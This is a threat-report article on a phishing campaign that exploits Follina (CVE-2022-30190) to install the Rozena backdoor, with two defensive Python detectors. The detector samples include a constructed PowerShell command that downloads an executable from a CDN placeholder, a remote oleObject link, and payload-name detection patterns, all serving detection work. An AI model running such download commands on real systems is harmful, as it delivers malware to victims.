Phishing Campaign Exploits Follina Vulnerability To Distribute Rozena Backdoor On Windows
This article focuses on a recent phishing campaign that exploits the Follina vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) to distribute the Rozena backdoor malware on Windows systems. The campaign employs various tactics to deceive victims into clicking on malicious links or previewing Microsoft Office documents containing embedded links. Upon exploitation of the vulnerability, the attackers gain complete control over the compromised machine. The attack chain involves the use of weaponized documents, a Discord CDN URL, PowerShell commands, and the download of next-stage payloads. The Rozena malware carries out multiple malicious activities, such as terminating the MSDT process, modifying the Windows Registry for persistence and stealth, downloading a decoy Word document, injecting shellcode, and establishing a reverse shell connection to the attacker’s host. The campaign utilizes different file types, including Word documents, Excel files, Windows shortcuts, and ISO image files, to facilitate the spread of malware. To mitigate this threat, Microsoft has released a patch (CVE-2022-30190), which users are strongly advised to apply promptly.
Key Takeaways
- A phishing campaign has been observed distributing the Rozena backdoor on Windows systems by exploiting the Follina vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT).
- The campaign uses a malicious external link embedded in a Microsoft Office document to trigger the exploit, luring victims into clicking the link or previewing the document.
- The impact of this attack is full control of the affected machine, allowing the threat actors to perform various malicious activities.
- The Rozena malware terminates the MSDT process, modifies the Windows Registry for persistence and stealth, downloads a harmless decoy Word document, injects shellcode into the file, and transmits a reverse shell request to the attacker’s host.
Attack Methodology
The phishing campaign exploits the Follina vulnerability to distribute the Rozena backdoor on Windows systems. Because the attack is fileless, it is harder to detect and mitigate than malware written to disk. Preventive measures against fileless attacks should therefore be in place: keeping software and operating systems up to date, using strong and unique passwords, and enforcing multi-factor authentication. Detection and mitigation strategies for remote shell injections should also be in place, including network segmentation, monitoring network traffic for suspicious activity, and using intrusion detection and prevention systems. Regular security awareness training for users remains essential to avoid falling victim to phishing campaigns and other social engineering tactics.
Technical Analysis
An examination of the attack chain reveals a weaponized document that connects to a Discord CDN URL and retrieves an HTML file (index.htm). That HTML file causes the MSDT diagnostic utility to run a PowerShell command. The next-stage payloads, the Rozena implant (Word.exe) and a batch file (cd.bat), are then downloaded from the same CDN attachment space. To detect fileless attacks like Rozena, organizations can monitor for suspicious PowerShell commands and analyze abnormal network traffic. Mitigation of the Follina vulnerability itself consists of applying the patch released by Microsoft; users should apply it promptly to avoid falling victim to this campaign and to prevent the Rozena backdoor from being injected onto Windows systems.
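As an added illustration of the PowerShell-monitoring advice above (example code written for this article, not from the original report or from any vendor), the following Python flags process-creation events that fit the chain just described: an Office host launching msdt.exe, msdt.exe carrying PowerShell in its arguments, and PowerShell fetching the campaign's next-stage files. The Sysmon-style field names, the Discord CDN hostname cdn.discordapp.com and the command lines are assumptions; the sample events are constructed.

```python
"""Added example (not from the original article): match process-creation
events against the Follina/Rozena chain described above. The events are
constructed in a simplified Sysmon Event ID 1 layout; the Discord CDN hostname
and the command lines are assumptions, not the campaign's real telemetry."""

OFFICE_APPS = {"winword.exe", "excel.exe"}  # Office hosts named in the article
PAYLOAD_MARKERS = ("cdn.discordapp.com", "index.htm", "word.exe", "cd.bat")

def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the names of every detection rule the event matches."""
    hits = []
    parent, image = basename(event["parent"]), basename(event["image"])
    cmd = event["cmdline"].lower()
    # Rule 1: an Office host has no business launching the diagnostic tool (Follina trigger).
    if parent in OFFICE_APPS and image == "msdt.exe":
        hits.append("office_spawned_msdt")
    # Rule 2: msdt.exe started with PowerShell baked into its arguments.
    if image == "msdt.exe" and ("powershell" in cmd or "invoke-expression" in cmd):
        hits.append("msdt_embedded_powershell")
    # Rule 3: PowerShell reaching for the host or file names this campaign used for next stages.
    if image in {"powershell.exe", "pwsh.exe"} and any(m in cmd for m in PAYLOAD_MARKERS):
        hits.append("powershell_fetches_campaign_payload")
    return hits

SAMPLE_EVENTS = [  # constructed: parent -> child, with the child's command line
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\msdt.exe",
     "cmdline": 'msdt.exe /id PLACEHOLDER_DIAG /param "powershell Invoke-Expression ..."'},
    {"parent": r"C:\Windows\System32\msdt.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c \"Invoke-WebRequest https://cdn.discordapp.com/attachments/PLACEHOLDER/Word.exe -OutFile Word.exe\""},
    {"parent": r"C:\Windows\explorer.exe",  # benign: user opens a document
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n C:\Users\user\Documents\quarterly.docx'},
    {"parent": r"C:\Windows\System32\control.exe",  # benign: troubleshooter from Control Panel
     "image": r"C:\Windows\System32\msdt.exe",
     "cmdline": "msdt.exe /id PLACEHOLDER_TROUBLESHOOTER"},
]

def scan(events):
    """(image name, matched rules) for each event that trips at least one rule."""
    return [(basename(e["image"]), classify(e)) for e in events if classify(e)]

if __name__ == "__main__":
    for image, rules in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(rules)}")
```

The two benign events show why the parent process and the command line both matter: msdt.exe launched from Control Panel trips nothing.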
Malware Activities
One of the tasks of the Rozena malware is to inject shellcode into a harmless decoy Word document. This technique allows the malware to hide its malicious activities and evade detection. By injecting shellcode, the malware gains the ability to execute commands and communicate with a remote server, enabling the attacker to gain control over the affected machine. To better understand the activities of the Rozena malware, the following table provides an overview of its tasks and activities:
| Task/Activity | Description |
|---|---|
| Terminate MSDT process | The malware terminates the Microsoft Windows Support Diagnostic Tool process to prevent detection and analysis. |
| Modify Windows Registry | The malware modifies the Windows Registry to achieve persistence and stealth, ensuring that it can survive system reboots and remain hidden from security tools. |
| Download decoy Word document | The malware downloads a harmless Word document as a decoy to divert attention from its malicious activities. |
| Inject shellcode | The malware injects shellcode, which contains the instructions for the next stage of the attack, into the decoy Word document. |
| Transmit reverse shell request | The malware sends a reverse shell request to the attacker’s host, establishing a communication channel for remote control and data exfiltration. |
In addition to these activities, it is important to note that fileless malware such as Rozena poses unique challenges for detection and mitigation. Fileless malware leverages legitimate processes and tools already present on a system, which makes it difficult to detect with traditional antivirus solutions. Mitigation strategies for fileless malware include behavior-based detection, monitoring for suspicious activity, and promptly applying security patches so that known vulnerabilities cannot be exploited. Social engineering also plays a significant role in malware distribution, as threat actors rely on deceptive techniques to trick users into clicking malicious links or opening infected documents. User awareness training and caution when interacting with unknown or suspicious content are therefore essential in preventing infections.
Exploited Files
Various types of files, including Microsoft Excel, Windows shortcut (LNK), and ISO image files, have been exploited by threat actors to spread malware and deploy malicious payloads on targeted devices. These files serve as droppers to deliver malware such as Emotet, QBot, IcedID, and Bumblebee. The threat actors employ social engineering techniques to exploit the vulnerability and entice victims into opening the malicious files. The phishing campaign leverages the Follina vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) to distribute the Rozena backdoor malware. By embedding a malicious external link in Microsoft Office documents, the attackers trick victims into clicking the link or previewing the document, triggering the exploit. This enables the threat actors to gain full control of the affected machine. It is crucial for users to apply the patch released by Microsoft to prevent the exploitation of the CVE-2022-30190 vulnerability and mitigate the risk of such vulnerability-related attacks.
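The external link that triggers the exploit lives in the document's relationship parts. The following Python, an added example rather than code from the article or from Microsoft, opens a .docx or .xlsx package, lists every relationship whose TargetMode is External, and singles out those that are not ordinary hyperlinks, since Office may fetch such targets when the file is opened or previewed. The minimal package it builds is constructed for the demo and its URLs are placeholders.

```python
"""Added example (not from the original article): scan an Office package for
relationships that point outside the file, the mechanism by which a
Follina-style document pulls remote content. The sample package is constructed."""
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

def external_relationships(package_bytes):
    """List every relationship with TargetMode="External" in any .rels part."""
    found = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                found.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "kind": rel.get("Type", "").rsplit("/", 1)[-1],  # trailing word of the type URI
                    "target": rel.get("Target", ""),
                })
    return found

def suspicious_externals(package_bytes):
    """External targets other than plain hyperlinks (e.g. an oleObject) deserve
    analyst attention: Office may fetch them when the file is opened or previewed."""
    return [r for r in external_relationships(package_bytes) if r["kind"] != "hyperlink"]

def build_sample_docx():
    """Constructed minimal package: one benign hyperlink plus one remote oleObject link."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/" TargetMode="External"/>'
        '<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://cdn.example.invalid/index.htm" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", '<?xml version="1.0"?><document/>')
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()
```

Run `suspicious_externals(open("sample.docx", "rb").read())` against a real file; an empty list means no remotely fetched objects were found, while a benign hyperlink alone does not raise a finding.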
CVE-2022-30190 Impact
CVE-2022-30190 makes it easy to spread malware through Microsoft Office documents, which prompted Microsoft to release a patch addressing the issue and reducing the risk of vulnerability-related attacks. This critical vulnerability has allowed threat actors to deliver malware via Word documents, gain control of affected machines, and potentially cause significant harm. The patch released by Microsoft on June 14, 2022, prevents exploitation of this vulnerability and protects users from such attacks. By applying it, users secure their systems against this flaw and reduce the risk of falling victim to the Rozena backdoor and similar threats. Implementing mitigation strategies and staying current with cybersecurity best practices remain crucial for long-term protection against evolving threats.
Frequently Asked Questions
How does the phishing campaign distribute the Rozena backdoor on Windows systems?
The campaign embeds a malicious external link in a Microsoft Office document and lures the victim into clicking the link or simply previewing the document. Either action triggers the Follina vulnerability in MSDT, which the threat actors then use to deliver the Rozena backdoor.
What files are involved in the attack chain of the Rozena malware?
The attack chain begins with a weaponized Office document that retrieves an HTML file (index.htm) from a Discord CDN URL; the next-stage payloads, the Rozena implant (Word.exe) and a batch file (cd.bat), are downloaded from the same CDN space. Once running, Rozena downloads a harmless decoy Word document and injects shellcode into it. To detect and remove the Rozena backdoor, best practices include using antivirus software and performing regular system scans.
What tasks and activities does the Rozena malware perform once it infects a system?
The Rozena malware performs several tasks and activities once it infects a system. These include terminating the MSDT process, modifying the Windows Registry for persistence and stealth, downloading a harmless decoy Word document, injecting shellcode into the file, and transmitting a reverse shell request to the attacker’s host. Detection and prevention techniques for Rozena backdoor involve behavioral analysis of the malware and the application of security measures such as patching vulnerabilities and employing endpoint protection solutions.
Which types of files are exploited by threat actors to spread malware?
Threat actors exploit common file types, such as Microsoft Excel, Windows shortcut (LNK), and ISO image files, to spread malware. These exploitation techniques are employed as part of phishing campaigns to deliver malicious payloads and infect victims’ devices.
What is the impact of the CVE-2022-30190 vulnerability and how can it be mitigated?
The impact of the CVE-2022-30190 vulnerability is significant, as it allows for the easy spread of malware via Word documents. To mitigate this vulnerability, users should apply the patch released by Microsoft on June 14, 2022. Applying the patch helps prevent exploitation and is an important step in preventing vulnerability-related attacks.